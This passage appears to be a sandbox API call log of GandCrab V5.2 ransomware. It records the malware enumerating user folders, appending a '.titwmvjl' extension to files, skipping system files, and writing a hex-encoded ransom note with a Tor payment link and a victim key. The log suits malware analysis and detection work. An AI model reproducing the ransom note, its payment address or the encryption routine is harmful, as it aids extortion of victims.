lpFindFileData=0x259ead4) returned 1 [0072.170] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0072.171] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0072.171] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\TITWMVJL-DECRYPT.txt" [0072.171] lstrlenW (lpString=".titwmvjl") returned 9 [0072.171] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\TITWMVJL-DECRYPT.txt") returned 98 [0072.171] VirtualAlloc (lpAddress=0x0, dwSize=0x104, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.171] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 107 [0072.171] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\TITWMVJL-DECRYPT.txt") returned 98 [0072.171] lstrlenW (lpString=".txt") returned 4 [0072.171] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.171] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0072.171] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0072.171] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.171] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\TITWMVJL-DECRYPT.txt") returned 98 [0072.171] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\TITWMVJL-DECRYPT.txt") returned 98 [0072.171] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0072.171] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0072.172] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0072.172] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0072.172] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0072.172] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0072.172] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0072.172] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0072.172] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.172] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 0 [0072.172] FindClose (in: hFindFile=0x503638 | out: hFindFile=0x503638) returned 1 [0072.172] CloseHandle (hObject=0x2c4) returned 1 [0072.173] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0072.173] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0072.173] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0072.173] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\d2ca4a09d2ca4deb61a.lock" [0072.173] lstrlenW (lpString=".titwmvjl") returned 9 [0072.173] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\d2ca4a09d2ca4deb61a.lock") returned 97 [0072.173] VirtualAlloc (lpAddress=0x0, dwSize=0x102, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.173] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 106 [0072.173] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\d2ca4a09d2ca4deb61a.lock") returned 97 [0072.173] lstrlenW (lpString=".lock") returned 5 [0072.173] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.173] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0072.173] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.174] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.174] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0072.174] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0072.174] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0072.174] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\TITWMVJL-DECRYPT.txt" [0072.174] lstrlenW (lpString=".titwmvjl") returned 9 [0072.174] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\TITWMVJL-DECRYPT.txt") returned 93 [0072.174] VirtualAlloc (lpAddress=0x0, dwSize=0xfa, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.174] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 102 [0072.174] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\TITWMVJL-DECRYPT.txt") returned 93 [0072.174] lstrlenW (lpString=".txt") returned 4 [0072.174] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.174] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0072.175] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0072.175] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.175] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\TITWMVJL-DECRYPT.txt") returned 93 [0072.175] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\TITWMVJL-DECRYPT.txt") returned 93 [0072.175] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0072.175] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0072.175] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0072.175] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0072.175] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0072.175] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0072.175] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0072.175] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0072.175] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.175] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 0 [0072.175] FindClose (in: hFindFile=0x503938 | out: hFindFile=0x503938) returned 1 [0072.176] CloseHandle (hObject=0x2bc) returned 1 [0072.176] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0072.176] lstrcmpW (lpString1="Excel", lpString2=".") returned 1 [0072.176] lstrcmpW (lpString1="Excel", lpString2="..") returned 1 [0072.176] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="Excel" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel" [0072.177] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\" [0072.177] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0072.177] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.177] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0072.177] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.177] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0072.177] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.177] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0072.177] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.178] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0072.178] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.178] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.178] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\\\TITWMVJL-DECRYPT.txt") returned 75 [0072.178] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\excel\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0072.179] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\